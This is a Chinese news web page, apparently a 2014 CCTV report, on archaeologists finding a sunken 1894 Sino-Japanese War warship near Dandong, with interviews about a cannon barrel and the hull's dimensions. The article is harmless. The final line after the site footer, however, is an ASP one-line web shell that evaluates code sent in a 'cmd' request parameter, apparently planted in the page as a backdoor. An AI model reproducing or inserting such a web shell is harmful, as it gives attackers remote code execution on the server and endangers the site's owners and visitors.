大陆新闻

内地水下考古队在黄海发现甲午海战沉没战舰

时间:2014-9-30 21:08:10  作者:  来源:央视  查看:113  评论:0
内容摘要:主持人:记者从国家文物局、水下文化遗产保护中心获息,考古人员在丹东黄海海域发现一艘体量在1600吨左右的沉船,经过初步探明,考古队认为,该船是中日甲午海战沉没的战舰,目前该战舰被命名为“丹东一号”。战舰全部深深的陷在泥沙里,只有零星的铁甲边缘和碎片微微突起...

主持人:记者从国家文物局、水下文化遗产保护中心获息,考古人员在丹东黄海海域发现一艘体量在1600吨左右的沉船,经过初步探明,考古队认为,该船是中日甲午海战沉没的战舰,目前该战舰被命名为“丹东一号”。

战舰全部深深的陷在泥沙里,只有零星的铁甲边缘和碎片微微突起于泥沙之上,还都附着着大量的海底生物和鱼网。

周春水(“丹东一号”水下考古重点调查领队):目前判断来讲,它受到外界因素损伤很严重,这个损伤是来自于很多原因,可能当时就被炸弹炸了,或者说锅炉爆炸,以及近现代人们的捕网,把它(碎片)捞起来。它表面看——抽沙之后大概一米左右——下面很凌乱的一些钢板,一些木板都是碎在下面的,都比较凌乱。

黎飞艳(“丹东一号”水下考古重点调查队员):这个船应该是烧过很厉害,我在下面拍照的时候,这些应该都是炭粒,为什么说这是个舰艇,有那个铁炮,它给炸开了,应该是破坏了,这是个铁炮。

记者:炮筒?

黎飞艳:炮筒,这两头应该都断了,这个(炮筒)也不是完整的,那一面好像也有点缺失,但是它是明显地看出外形应该是一个炮的炮筒。

记者:而且它挺厚的,不薄。

黎飞艳:大概有4公分厚。具体还没有量。

虽然无法确定这个炮筒的具体位置,但作为判断是不是战舰,武器装备将是最有力的证据。

周春水:在这儿我们很幸运的找到了几个能说明问题的东西,一个就是找到一门炮,还有一些弹药的东西,包括一个子弹,而且还包括舰体,因为它是一直延续过去,我们经过搜索发现,它是一个至少从这到这是50米。

记者:(长度)已经有50米了?

周春水:宽度是10米,这个长宽比已经至少达到5了,这么一个修长的一个舰体、长宽比,它肯定是属于战舰之类的东西。

2014年,丹东港建设规划启动,针对将要进行建设的水下区域,也同步展开了文物调查工作。作为甲午中午海战的主战场,会不会有沉没战舰,就在将要建设的海域内,也成为重点排查的内容。

黄梅雨:最初的时候,我们主要是针对这个港口,海洋红港区规划的主航道和锚地,在这个范围内进行初步调查,然后在航道周边,又设定了一个两侧各十(公里),包括锚地延伸十公里(范围)进行调查,在这个过程中发现的。

发现沉船的海域,正是历史上著名的甲午海战的交战区,这和很多历史资料的记载完全吻合。120年前,中日甲午战争爆发,9月17号,中日双方海军主力在黄海北部海域爆发海战,亦称中日甲午海战,大东沟海战。此役,北洋水师失利,共损失五艘战舰,日本联合舰队多艘战舰受重创,但未沉一舰,北洋舰队有四艘战舰都沉没在交战区,他们是志远、经远、超勇和扬威舰。

周春水:不管它是属于哪个舰,它的意义都是很重大的。

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):